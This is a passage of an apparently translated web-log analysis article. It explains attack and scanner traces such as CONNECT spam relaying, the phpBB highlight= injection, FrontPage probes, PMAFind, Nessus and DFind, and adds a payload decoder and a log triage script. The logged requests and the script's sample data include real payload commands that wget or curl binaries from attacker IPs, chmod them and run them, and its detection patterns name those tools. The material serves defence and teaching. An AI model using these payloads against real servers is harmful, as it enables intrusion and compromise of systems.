* Cisco Security Advisory: IOS HTTP Authorization Vulnerability
http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
* Old Cisco exploit tries to make a return:
http://isc.sans.org/diary.php?storyid=1104
* Multi-thread Cisco HTTP vulnerable scanner
http://wayreth.eu.org/cisco_scanner.c
15. Requests attempting to use the server as a proxy
220.137.xx.xxx - - [12/Dec/2005:05:07:19 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
220.137.xx.xxx - - [12/Dec/2005:05:11:49 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
61.228.xxx.xxx - - [30/Jan/2006:10:42:28 +0900] "CONNECT msa-mx8.hinet.net:25 HTTP/1.0" 405 231 "-"
- IP : Taiwan (TW, 220.137.0.0/16)
       Taiwan (TW, 61.228.0.0/14)
- These are proxy requests made through the HTTP CONNECT method. The request CONNECT msa-mx6.hinet.net:25 tries to pass through this web server, connect to port 25 (SMTP) of the msa-mx8.hinet.net server, and then send spam mail. From the point of view of the msa-mx8.hinet.net mail server, the source IP of the spam is the web server, so the spammer's location is hidden.
- Status code 405 above means that use of the CONNECT method was not allowed. If the code is 200, connect to port 80 of the web server and check the result yourself. If the result is not web page content, CONNECT may be allowed, so restrict use of the CONNECT method in the web server configuration.
$ telnet 123.123.123.123 80
Trying 123.123.123.123...
Connected to ????.???.??? (123.123.123.123).
Escape character is '^]'.
CONNECT xxx.xxx.xxx.xxx:25 HTTP/1.0
... (output omitted) ...
References :
* Sending spam mail via a proxy server
http://linux4you.co.kr/bbs/view.php?id=lbd05&no=76
* Re: Strange apache logs: CONNECT
http://seclists.org/lists/incidents/2002/Nov/0131.html
* HTTP/1.1 Method Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
16. Attack exploiting a vulnerability in Microsoft FrontPage Server Extensions
85.224.xxx.xx - - [01/Dec/2005:00:33:20 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
85.224.xxx.xx - - [01/Dec/2005:00:35:04 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
85.224.xxx.xx - - [01/Dec/2005:00:43:42 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
- IP : Netherlands (NL, 85.0.0.0 - 85.255.255.255)
References :
* CVE-2001-0341
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0341
* Microsoft FrontPage Server Extensions Buffer Overflow (fp30reg.dll)
http://www.securiteam.com/exploits/6A00J1P8UQ.html
17. Attack exploiting the viewtopic.php vulnerability in phpBB
130.63.xxx.xxx - - [23/Feb/2006:23:26:52 +0900] "GET /bbs/viewtopic.php?t=1112&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
60.248.xxx.xxx - - [23/Feb/2006:23:43:43 +0900] "GET /bbs/viewtopic.php?p=2113&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
- IP : Canada (CA, 130.63.0.0 - 130.63.255.255)
       Taiwan (TW, 60.248.0.0 - 60.248.255.255)
- phpBB versions before 2.0.11 process the value passed in highlight= of viewtopic.php with the urldecode() function, which is a security problem. Through this vulnerability a remote attacker can execute commands of their choice. The Santy worm, which automates this, spread rapidly from late 2004, and such attacks are still continuing.
References :
* Blocking the phpBB worm in Apache and logging it separately (by 좋은진호, 2005.2)
http://coffeenix.net/board_print.php?bd_code=742
* Database passwords is open. Passthru() is available. [Highlight Vulnerability]
http://www.phpbb.com/security/final_reports.php?p=1
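
Added example (not code from the original article): decoding the highlight= value of the first log line in this section, layer by layer, shows both the double percent-encoding that makes urldecode() the problem and the command the probe asks for. The function names are this example's own.

```python
import re
from urllib.parse import unquote

# highlight= value copied from the first phpBB log line in this section.
HIGHLIGHT = (
    "%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)"
    "%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)"
    "%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)"
    "%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)"
    "%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)"
    "%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527"
)

# A run of chr(N) terms joined with PHP's "." concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\d{1,3}\)(?:\.chr\(\d{1,3}\))*")


def decode_layers(value, max_rounds=5):
    """Percent-decode until the text stops changing; keep every layer.

    layers[0] is what the access log shows, layers[1] is what PHP receives
    after the normal request decoding, layers[2] is what an extra
    urldecode() call in the application produces.
    """
    layers = [value]
    for _ in range(max_rounds):
        decoded = unquote(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers


def hidden_strings(text):
    """Return the strings that chr(N).chr(M)... chains spell out."""
    found = []
    for chain in CHR_CHAIN.finditer(text):
        codes = re.findall(r"chr\((\d{1,3})\)", chain.group(0))
        found.append("".join(chr(int(c)) for c in codes))
    return found


def analyse(value):
    layers = decode_layers(value)
    return {
        "encoding_depth": len(layers) - 1,   # 2 means double-encoded
        "layers": layers,
        "hidden_strings": hidden_strings(layers[-1]),
    }


if __name__ == "__main__":
    report = analyse(HIGHLIGHT)
    print("encoding depth:", report["encoding_depth"])
    for i, layer in enumerate(report["layers"]):
        print(f"layer {i}: {layer[:60]}...")
    print("command in chr() chain:", report["hidden_strings"])
```

After one decoding pass the quote is still written as %27, so it only becomes a literal quote character once the application decodes the value a second time.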
18. Attack exploiting phpMyAdmin vulnerabilities
81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /PMA/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /mysql/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /admin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /db/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /dbadmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /admin/pma/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/mysql/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /phpmyadmin2/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysqladmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:04 +0900] "GET /myadmin/main.php HTTP/1.0" 404 0 "PMAFind"
- IP : United Kingdom (GB=UK, 81.5.128.0 - 81.5.191.255)
- PMAFind is a Windows tool written by a German author to find vulnerabilities in PHPMyAdmin web interfaces. It can be given an IP range, or it can scan in bulk from a list of IPs saved to a file.
References :
* Pmafind.exe, PHPMyAdmin-Scanner
http://www.governmentsecurity.org/forum/index.php?showtopic=17244
* Multiple XSS Vulnerabilities in phpMyAdmin 2.6.0-pl2 and prior (2004.11)
http://www.netvigilance.com/html/advisory0005.htm
* phpMyAdmin Multiple Remote Vulnerabilities (2004.12)
http://www.securityfocus.com/bid/11886
* phpMyAdmin Remote Command Execution Vulnerability (2004.10)
http://www.securityfocus.com/bid/11391
19. Log left by the Korean PlantyNet web robot
218.232.120.xx - - [20/Jan/2006:12:16:11 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
218.232.120.xx - - [26/Jan/2006:20:48:54 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
- IP : Korea (PlantyNet, 218.232.120.0-218.232.120.127)
- Does the web robot of PlantyNet, which provides a harmful-site blocking service, really look for robotsxx.txt rather than robots.txt??? I asked PlantyNet for an answer on this, but there has been no reply yet.
References :
* A strange spider that looks for robotsxx.txt
http://j2k.naver.com/j2k_frame.php/korean/www.tkamiya.net/sd5/archives/000601.html
http://www.tkamiya.net/sd5/archives/000601.html
20. When the vulnerability scanner Nessus is used to look for vulnerabilities
61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 12931 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:10 +0900] "GET /fpFWUpload.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:11 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /NessusTest17153.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /foo.jsp?param=<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 406 535 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "TRACE /Nessus8348.html HTTP/1.1" 200 288 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
... (rest omitted) ...
- IP : China (CN, 61.177.0.0 - 61.177.255.255)
- This is the log left when a scan is requested with the security vulnerability scanner Nessus. If you did not request it yourself, it is an attempt to find attack targets.
References :
* Vulnerability Scanner Nessus
http://www.nessus.org/
* Nessus analysis report
http://www.certcc.or.kr/servlet/download?mode=secu_tools&file=linux_Nessus.pdf
21. Log left by the security scanning tool DFind
211.202.x.xxx - - [15/Mar/2006:09:54:44 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
211.202.x.xxx - - [15/Mar/2006:09:55:12 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
- IP : Korea (IP range allocated to Hanaro Telecom, 211.202.0.0-211.202.3.255)
- The log above is the signature left by the port scanning tool DFind. DFind is a tool with features such as port scanning, ping checks, vulnerability scanning, identifying the web server type, and finding out whether a given HTML file exists.
References :
* w00tw00t.at.ISC.SANS.DFind
http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/
* w00tw00t
http://isc.sans.org/diary.php?storyid=900
http://isc.sans.org/diary.php?storyid=591
* DFind
http://class101.org
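
Added example (not part of the original article): a small triage pass that reads access-log lines the way the article does, matching each request against the signatures shown in the sections above and using the status code to separate refused attempts from lines that need a closer look. Sample lines marked as copied are from this page; the constructed lines, the rule names and the treatment of status codes other than 404 and 405 are this example's assumptions.

```python
import re
from urllib.parse import unquote

# Access-log line as on this page; the quoted fields after the size are
# optional. The protocol token is matched loosely because some logged
# requests carry a malformed one (HTTP\x01.1).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP[^" ]*" '
    r'(?P<status>\d{3}) \S+(?P<rest>.*)$'
)

# Signatures taken from the log lines in this article.
RFI = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I)          # sec. 5-8, 10, 11
CMD = re.compile(r'[|`]|;\s*(?:wget|curl|chmod|perl)\b', re.I)   # sec. 1, 4
SCANNER_UA = re.compile(r'Nessus|PMAFind', re.I)                 # sec. 18, 20
SCANNER_PATH = re.compile(
    r'w00tw00t|/sumthin|ThisFileMustNotExist|thisdoesnotexist', re.I
)                                                                # sec. 3, 11, 13, 21


def classify(method, target, user_agent):
    """Return a rule name for a request, or None when nothing matches."""
    decoded = unquote(unquote(target))       # undo single and double encoding
    path, _, query = decoded.partition('?')
    if method == 'CONNECT':                  # sec. 15: proxy request
        return 'proxy-abuse'
    if RFI.search(decoded):
        return 'remote-file-include'
    if CMD.search(query):
        return 'command-injection'
    if SCANNER_UA.search(user_agent) or SCANNER_PATH.search(path):
        return 'scanner'
    return None


def verdict(status):
    """The article reads 404 (and 405 for CONNECT) as an attempt only.

    Assumption of this example: every 4xx is treated that way, and any
    other status is flagged for manual review.
    """
    return 'attempt' if 400 <= status < 500 else 'review'


def triage(lines):
    """Return (ip, rule, verdict) for every line that matches a rule."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        quoted = re.findall(r'"([^"]*)"', m['rest'])
        user_agent = quoted[-1] if quoted else ''
        rule = classify(m['method'], m['target'], user_agent)
        if rule:
            findings.append((m['ip'], rule, verdict(int(m['status']))))
    return findings


# Lines 1-4 and 6-8 are copied from this page; lines 5 and 9 are constructed.
SAMPLE = r'''
203.194.xxx.xx - - [17/Jan/2006:02:09:04 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /board/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
213.203.xxx.xx - - [10/Jan/2006:17:59:57 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
220.137.xx.xxx - - [12/Dec/2005:05:07:19 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
192.0.2.10 - - [12/Dec/2005:05:20:00 +0900] "CONNECT mail.example.net:25 HTTP/1.0" 200 0 "-"
81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
211.202.x.xxx - - [15/Mar/2006:09:54:44 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 12931 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
198.51.100.7 - - [06/Mar/2006:11:15:00 +0900] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''.splitlines()


if __name__ == '__main__':
    for ip, rule, result in triage(SAMPLE):
        print(f'{result:8} {rule:20} {ip}')
```

The constructed CONNECT line answered with 200 is the case the article says to check by hand, and it is reported as review rather than attempt.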